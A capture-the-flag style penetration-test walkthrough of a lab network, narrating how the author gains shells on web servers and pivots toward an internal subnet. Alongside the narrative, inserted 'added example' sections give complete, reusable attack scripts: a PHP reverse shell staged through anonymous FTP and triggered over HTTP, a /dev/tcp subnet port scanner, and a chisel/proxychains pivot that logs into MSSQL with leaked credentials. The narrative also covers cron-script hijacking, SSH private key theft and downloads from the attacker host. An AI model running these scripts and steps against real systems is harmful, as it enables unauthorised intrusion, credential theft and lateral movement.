After downloading our VPN file we can VPN into the network
First I want to scan the edge network and see if I can gain a foothold on one of the edge machines
sudo nmap -sCV 10.10.0.0/24 -oA edge_machines
results
10.10.0.4
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.9 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 a0:3e:31:d7:16:fe:28:78:8b:5b:90:72:42:e5:67:a4 (RSA)
| 256 56:09:1f:b0:b1:88:47:01:e4:5a:4d:c1:89:13:60:1f (ECDSA)
|_ 256 d9:74:e4:6f:05:49:54:d3:ec:ed:7a:1c:b4:76:1d:c4 (ED25519)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
443/tcp open ssl/http Apache httpd 2.4.41 ((Ubuntu))
|_http-title: Site doesn't have a title (text/html).
| ssl-cert: Subject: commonName=33e9fb8d175421613fb4.access-snaplabs.io
| Subject Alternative Name: DNS:33e9fb8d175421613fb4.access-snaplabs.io
| Not valid before: 2024-01-10T00:00:00
|_Not valid after: 2024-04-09T23:59:59
|_ssl-date: TLS randomness does not represent time
| tls-alpn:
|_ http/1.1
|_http-server-header: Apache/2.4.41 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Ubuntu machine
HTTP and HTTPS web server Apache 2.4.41
SSH
10.10.0.103
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3
| ftp-syst:
| STAT:
| FTP server status:
| Connected to ::ffff:10.10.0.4
| Logged in as ftp
| TYPE: ASCII
| No session bandwidth limit
| Session timeout in seconds is 300
| Control connection is plain text
| Data connections will be plain text
| At session startup, client count was 3
| vsFTPd 3.0.3 - secure, fast, stable
|_End of status
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| -rw-r--r-- 1 0 0 10918 Jul 25 2021 index.html
|_drwxrwxrwx 2 0 0 4096 Jul 25 2021 temp [NSE: writeable]
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 ab:8f:b8:06:41:f2:dd:92:cd:c4:92:60:53:d4:cf:2e (RSA)
| 256 ac:96:0a:75:d0:88:ca:16:87:5f:7d:5b:a4:6f:cd:9e (ECDSA)
|_ 256 5e:ce:7a:e3:90:9e:dd:a7:4d:24:0f:8e:a3:d7:23:07 (ED25519)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
|_http-title: Apache2 Ubuntu Default Page: It works
|_http-server-header: Apache/2.4.41 (Ubuntu)
443/tcp open ssl/http nginx
| ssl-cert: Subject: commonName=10.10.0.103
| Not valid before: 2021-07-17T14:19:12
|_Not valid after: 2021-08-16T14:19:12
| http-robots.txt: 54 disallowed entries (15 shown)
| / /autocomplete/users /autocomplete/projects /search
| /admin /profile /dashboard /users /help /s/ /-/profile /-/ide/
|_/*/new /*/edit /*/raw
| http-title: Sign in \xC2\xB7 GitLab
|_Requested resource was https://10.10.0.103/users/sign_in
|_ssl-date: TLS randomness does not represent time
|_http-trane-info: Problem with XML parsing of /evox/about
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
FTP (anonymous access allowed)
SSH
HTTP and HTTPS (GitLab behind nginx on 443)
we can also see GitLab's robots.txt, which confirms the application
10.10.0.181
Nmap scan report for 10.10.0.181
Host is up (0.24s latency).
Not shown: 998 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 c3:a6:3b:dc:4a:19:ba:d3:97:ce:7f:d3:df:af:da:df (RSA)
| 256 5e:9f:ee:d8:c8:5a:42:95:96:27:39:61:58:94:a6:d8 (ECDSA)
|_ 256 88:4d:51:17:06:bd:d2:8b:d7:3e:3c:79:7d:d5:38:95 (ED25519)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 256 IP addresses (4 hosts up) scanned in 126.05 seconds
SSH
HTTP web server
Let's scan all ports on the targets to see if we are missing anything
The only new ports we found were on host 10.10.0.103 (8060 and 9094)
results
Nmap scan report for 10.10.0.103
Host is up (0.24s latency).
Not shown: 65486 closed tcp ports (reset), 43 filtered tcp ports (no-response)
PORT STATE SERVICE
21/tcp open ftp
22/tcp open ssh
80/tcp open http
443/tcp open https
8060/tcp open aero
9094/tcp open unknown
10.10.0.103
Looking through the output we can see that machine 10.10.0.103 allows anonymous FTP access, which seems like a good place to start
ftp anonymous@10.10.0.103
Listing the contents we find the following
Include in report: anonymous access via FTP
We have read access to index.html
and rwx privileges within the temp directory
Looking in the temp directory we can't see anything
Let's check out the web server and see if it is connected in some way to the FTP server
We see the default Apache installation page; the index.html we saw in the FTP listing is most likely this page
We can confirm this is indeed Ubuntu
This is concerning: we have anonymous write access to the document root of the web server via FTP
Let's check out HTTPS
We can see a GitLab application
Not much here
I want to test whether we can upload a PHP reverse shell to the FTP temp directory and trigger it through the URL
Copy our PHP reverse shell into our working directory, start a listener, and upload rev.php into temp over FTP
Navigate to http://10.10.0.103/temp/rev.php; looking back at our listener we should have a shell on 10.10.0.103
We have our first shell, woohoo
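The write-up does not show the reverse shell or the upload itself, so here is the whole step as a script. This is an added example, not code from the original write-up: it assumes curl on the attacker box, a listener such as nc -lvnp 4444 already waiting, that the FTP root is the Apache document root (which the temp directory being reachable at /temp/ on port 80 suggests), and the hosts and port below, which are taken from the write-up or chosen for the example. The PHP payload uses fsockopen plus proc_open rather than the exec "<&3" trick, because under mod_php the socket's file descriptor number is not predictable.

```shell
#!/usr/bin/env bash
# Added example (not from the original write-up): stage a PHP reverse shell through
# the anonymous, world-writable FTP "temp" directory and trigger it over HTTP.
# Assumptions (not on the page): curl on the attacker box, FTP root == /var/www/html,
# LPORT 4444 (the page never states the first listener's port).
TARGET="${TARGET:-10.10.0.103}"
LHOST="${LHOST:-10.9.254.6}"
LPORT="${LPORT:-4444}"

# Write a minimal PHP reverse shell: connect back with fsockopen and hand the
# socket to an interactive /bin/sh as stdin, stdout and stderr via proc_open.
make_php_revshell() {
    out="$1"; host="$2"; port="$3"
    cat > "$out" <<EOF
<?php
\$sock = fsockopen("$host", $port);
if (!\$sock) { exit(1); }
\$proc = proc_open("/bin/sh -i", array(0 => \$sock, 1 => \$sock, 2 => \$sock), \$pipes);
?>
EOF
}

# Anonymous FTP upload with curl; a URL ending in "/" keeps the local file name.
ftp_upload() {
    curl -s -T "$1" "ftp://anonymous:anonymous@$TARGET/temp/"
}

# Request the uploaded file so Apache executes it. The HTTP request stays open
# for as long as the shell lives, so it is backgrounded.
trigger_shell() {
    curl -s "http://$TARGET/temp/$(basename "$1")" >/dev/null 2>&1 &
}

# Usage (attacker box, with `nc -lvnp 4444` already listening):
#   ./stage_revshell.sh run
if [ "${1:-}" = "run" ]; then
    make_php_revshell rev.php "$LHOST" "$LPORT"
    ftp_upload rev.php
    trigger_shell rev.php
fi
```

The same three functions work for any writable directory that the web server will execute PHP from; only the FTP path and the URL prefix change.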
Lets enumerate the other web server and come back
HOST 10.10.0.181
When we click on "show me the goods" we can see the following
Looks like output from a PHP script (given the get_repos.php?); it is an array with the following key-value pairs
name: looks like a possible web directory, project or role: website-dev
author: the author of the website is "brandon"
access: the level of access is set to public
Let's check this URL out and see if we can find anything interesting
Looks like we have access to that GitLab server we found earlier
Add to report (sensitive information exposure)
Nothing interesting in these files, let's check the commit history
Checking through the commits we do find something interesting
Looks like we have a set of creds for the host 10.10.1.111, database gitlab; sa is the default MSSQL sysadmin login, and the password could be reusable
sa: VeryVeryVerySecure1!
Sensitive information exposure: credentials for a host in the internal subnet sitting in a public repo
Try them anywhere we can
host 10.10.0.103
Let's see if we can log in to the GitLab server using these credentials
No luck
host 10.10.0.103 WEB-2 shell as www-data
Alright, now that we have our initial foothold on one of the external servers, let's get to know our landscape
Let's upgrade our current shell; since this is an Ubuntu server python3 should already be installed, so
python3 -c "import pty;pty.spawn('/bin/bash')"
First I want to find any creds, keys, anything to escalate our privileges
We need to find what users are on the system
cat /etc/passwd
We find one non-system user on the box, brandon
Let's see if we can find anything within brandon's home directory
ls -al /home/brandon
We do see a .ssh directory; let's see if we can find any private keys
We do not have permission yet. Let's see if we can su to brandon using the credentials we found earlier in the git commits
No luck
Let's download linpeas.sh onto WEB2 and see if we can find anything interesting
Copy linpeas to the working directory
cp /opt/linpeas/linpeas.sh ./
Start a python3 server
python3 -m http.server 80
From our shell on WEB2 let's download the script into the /tmp directory
wget http://10.9.254.6/linpeas.sh
Let's run the script
bash ./linpeas.sh > linpeas.output
I personally like saving the linpeas output to a file, it is easier to reference later on
Let's start a python http server on WEB2 so we can download our linpeas.output file
python3 -m http.server 9000
Let's download it to our local host
wget http://10.10.0.103:9000/linpeas.output
We do find something interesting in the cron.d directory
cd /etc/cron.d
We can see a cron job that isn't default
We can see the script /etc/log-time.sh is executed as the user brandon; let's see what permissions we have on the script
ls -al /etc/log-time.sh
The permissions for everyone (owner, group and other) are read, write and execute, meaning we should be able to append a reverse shell to the script, and when the cron job next runs we should get a shell as the user brandon
Let's reuse our rev.php script with a different port, in my case 9010, saved as rev1.php, and start a listener on that port
Start a python server
python3 -m http.server 80
Download our rev1.php into the /tmp directory on WEB2
cd /tmp
wget http://10.9.254.6/rev1.php
Now we want to append a line to the log-time.sh script to run our PHP script
echo "php /tmp/rev1.php" >> /etc/log-time.sh
Now we just need to wait for the cron job to execute and we should have a hit on our listener
Note: I was having problems executing our rev1.php, so I decided to reuse the rev.php we placed in the /var/www/html/temp/ directory
With a shell as brandon we can now read the private key in /home/brandon/.ssh. Let's copy id_rsa to our local host and SSH into the machine
Give it the necessary permissions
chmod 600 id_rsa
Let's see if we can authenticate to WEB2
ssh -i id_rsa brandon@10.10.0.103
We now have SSH access to the WEB2 machine
Let's start branching out to other devices on the network
Checking the network interfaces on WEB2
HOST 10.10.0.181 WEB1
Let's see if we can SSH into 10.10.0.181 using brandon's private key
ssh -i id_rsa brandon@10.10.0.181
Woohoo, we can
Let's check if there are any other users on the box
cat /etc/passwd
No other users
Let's run linpeas and see if we can find anything
We should still have our python server up, so we can
cd /tmp
wget http://10.9.254.6/linpeas.sh
bash ./linpeas.sh > WEB1LP.output
Let's download the linpeas output file
Start a python server on WEB1
python3 -m http.server 9000
Download the output file to our local machine
wget http://10.10.0.181:9000/WEB1LP.output
Not a lot to go on, will review later
Now that we have access to both WEB1 and WEB2 external servers, we need to find a way to start pivoting into the internal servers located in the 10.10.1.0/24 subnet
We need to find the IP addresses of the internal hosts (in case we are not looking at our Snap Labs lab)
We can write a quick bash script to ping sweep the internal subnet: one probe per host, run in parallel with a 1 second timeout, and a wait at the end so the script does not exit before the replies come back
#!/bin/bash
for i in {1..254}; do
  (ping -c 1 -W 1 10.10.1.${i} | grep "bytes from") &
done
wait
Save this to a .sh file and upload it to the WEB1 host using a python server and wget
I also want to do some port scanning on the internal servers, or at least identify any open ports
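Before setting up a tunnel it is often quicker to check the interesting ports from the pivot itself. As an added example that is not part of the original write-up, the script below does that with bash's /dev/tcp pseudo-device, so nothing has to be uploaded to WEB1 beyond the script. It assumes bash and coreutils timeout on the pivot (both present on the Ubuntu hosts here); the port list is a guess at what internal hosts might run, not something taken from the page.

```shell
#!/usr/bin/env bash
# Added example (not from the original write-up): TCP port check from a pivot host
# that has no nmap, using bash's /dev/tcp. Assumptions (not on the page): bash
# and coreutils `timeout` exist on the pivot; the port list is a guess.

# Return 0 if a TCP connect to host:port succeeds within 1 second, non-zero
# otherwise. The connect runs in a child bash so a hung handshake can be killed
# instead of blocking the whole scan.
port_open() {
    timeout 1 bash -c "exec 3<>/dev/tcp/$1/$2" 2>/dev/null
}

# Check a list of ports on one host and print the open ones as host:port.
scan_host() {
    host="$1"; shift
    for p in "$@"; do
        if port_open "$host" "$p"; then echo "$host:$p open"; fi
    done
}

# Sweep a /24 (given as its first three octets) for the listed ports, one
# background job per host, then wait for all of them before returning.
scan_subnet() {
    net="$1"; shift
    for i in $(seq 1 254); do
        scan_host "$net.$i" "$@" &
    done
    wait
}

# Usage on WEB1, covering SSH, web, SMB, MSSQL, RDP and WinRM:
#   ./devtcp_scan.sh 10.10.1 22 80 443 445 1433 3389 5985
if [ $# -ge 2 ]; then scan_subnet "$@"; fi
```

A refused connection returns immediately, so a /24 with a handful of ports finishes in a few seconds; filtered ports cost the full 1 second timeout each, which is why the per-host jobs run in parallel.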
Let's utilize chisel
Clone the repo
git clone https://github.com/jpillora/chisel.git
Within the chisel directory we want to run go build
Within /chisel/executables/linux we will find the executable; I like to change the file name for ease of typing
mv chisel_1.9.1_linux_amd64 ch.sh
Let's upload it to WEB1, your python server should still be up and running
#WEB1
wget http://10.9.254.6/ch.sh
First we want to set up the chisel server on our local machine
./ch.sh server -p 9010 --reverse
-p: specifies the port chisel listens on
--reverse: tells the server (us) that clients connecting in are allowed to define reverse tunnels, essentially meaning clients can open listening ports on our local machine
Now the client (WEB1); since we have already transferred ch.sh (chisel), the basic syntax is
./ch.sh client <server ip (our local machine ip)>:<server port (the port we gave -p)> <remote string> [<more remote strings>]
./ch.sh client 10.9.254.6:9010 R:1080:socks
R:1080:socks opens a SOCKS5 listener on port 1080 on our local machine; anything sent to it is forwarded out through WEB1
Looking back at our local machine we should see a connection
Now we can configure our proxychains file to route through chisel
We need to configure our proxychains.conf file
sudo vi /etc/proxychains.conf
We need to create an entry pointing to our local host and the SOCKS port (socks5 127.0.0.1 1080); this is the port from the R:1080:socks remote, not the 9010 chisel control port, which does not speak SOCKS
Now we should be able to proxy our nmap scan through proxychains and chisel
Now we should be able to run nmap scans on particular ports: the commit referenced a database on 10.10.1.111 with an sa account, so most likely MSSQL, whose default port is 1433, and we expect a Windows Domain Controller in the internal subnet as well. Scans through a SOCKS proxy must be full connect scans (-sT) with host discovery and DNS disabled (-Pn -n), since raw-socket SYN scans bypass proxychains entirely
proxychains nmap -sT -Pn -n -p 1433 10.10.1.111
We are having problems with nmap going through sshuttle
We know the commit credentials are for the database, so we should be able to connect directly
For this we will use Impacket's mssqlclient.py
Let's try chisel again
Let's create a SOCKS proxy so we can proxy through 10.10.0.181 into the internal subnet 10.10.1.0/24
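To keep the ports straight, here is the pivot from the last few steps as one script. This is an added example, not code from the original write-up or from the chisel project: it assumes chisel 1.9.x on both ends, proxychains-ng (proxychains4, which accepts -f to name a config file, so the /etc/proxychains.conf vs /etc/proxychains4.conf question on the attacker box does not matter) and Impacket on the attacker box, and the addresses, ports and credentials from the write-up.

```shell
#!/usr/bin/env bash
# Added example (not from the original write-up): the chisel + proxychains pivot
# as one script, with the ports wired up consistently. Assumptions (not on the
# page): chisel 1.9.x on both ends, proxychains-ng (proxychains4) and Impacket on
# the attacker box; addresses, ports and credentials are from the write-up.
ATTACKER="${ATTACKER:-10.9.254.6}"
PIVOT="${PIVOT:-10.10.0.181}"
CHISEL_PORT="${CHISEL_PORT:-9010}"   # chisel control channel (server -p)
SOCKS_PORT="${SOCKS_PORT:-1080}"     # SOCKS5 listener opened on the attacker by R:1080:socks

# Write a proxychains config that points at the reverse SOCKS listener.
# The proxy line must name the SOCKS port (1080), not the chisel port (9010):
# 9010 only carries chisel's own tunnel traffic and will not answer SOCKS.
# A wrong line would look like:  socks5 127.0.0.1 9010
write_proxychains_conf() {
    conf="$1"; port="$2"
    cat > "$conf" <<EOF
strict_chain
proxy_dns
tcp_read_time_out 15000
tcp_connect_time_out 8000
[ProxyList]
socks5 127.0.0.1 $port
EOF
}

# Attacker side: accept reverse tunnels on the control port.
chisel_server() { ./ch.sh server -p "$CHISEL_PORT" --reverse; }

# Pivot side (run on WEB1, $PIVOT): connect back and open SOCKS on the attacker.
chisel_client() { ./ch.sh client "$ATTACKER:$CHISEL_PORT" "R:$SOCKS_PORT:socks"; }

# Scans through SOCKS must be full TCP connects with no ping and no DNS, because
# raw-socket SYN probes bypass the LD_PRELOAD hook and never enter the tunnel.
# $1 = proxychains config, $2 = ports, $3 = target
proxy_nmap() { proxychains4 -q -f "$1" nmap -sT -Pn -n -p "$2" "$3"; }

# Connect to the internal MSSQL host with the credentials found in the commit.
proxy_mssql() { proxychains4 -q -f "$1" mssqlclient.py "sa:VeryVeryVerySecure1!@10.10.1.111"; }

# Usage (attacker):  write_proxychains_conf ./pc.conf "$SOCKS_PORT"; chisel_server &
#                    then on WEB1: chisel_client
#                    proxy_nmap ./pc.conf 1433 10.10.1.111; proxy_mssql ./pc.conf
```

proxy_dns is kept on so that hostnames resolve through the tunnel rather than leaking to the attacker's resolver; with IP targets, as here, it has no effect on the scan.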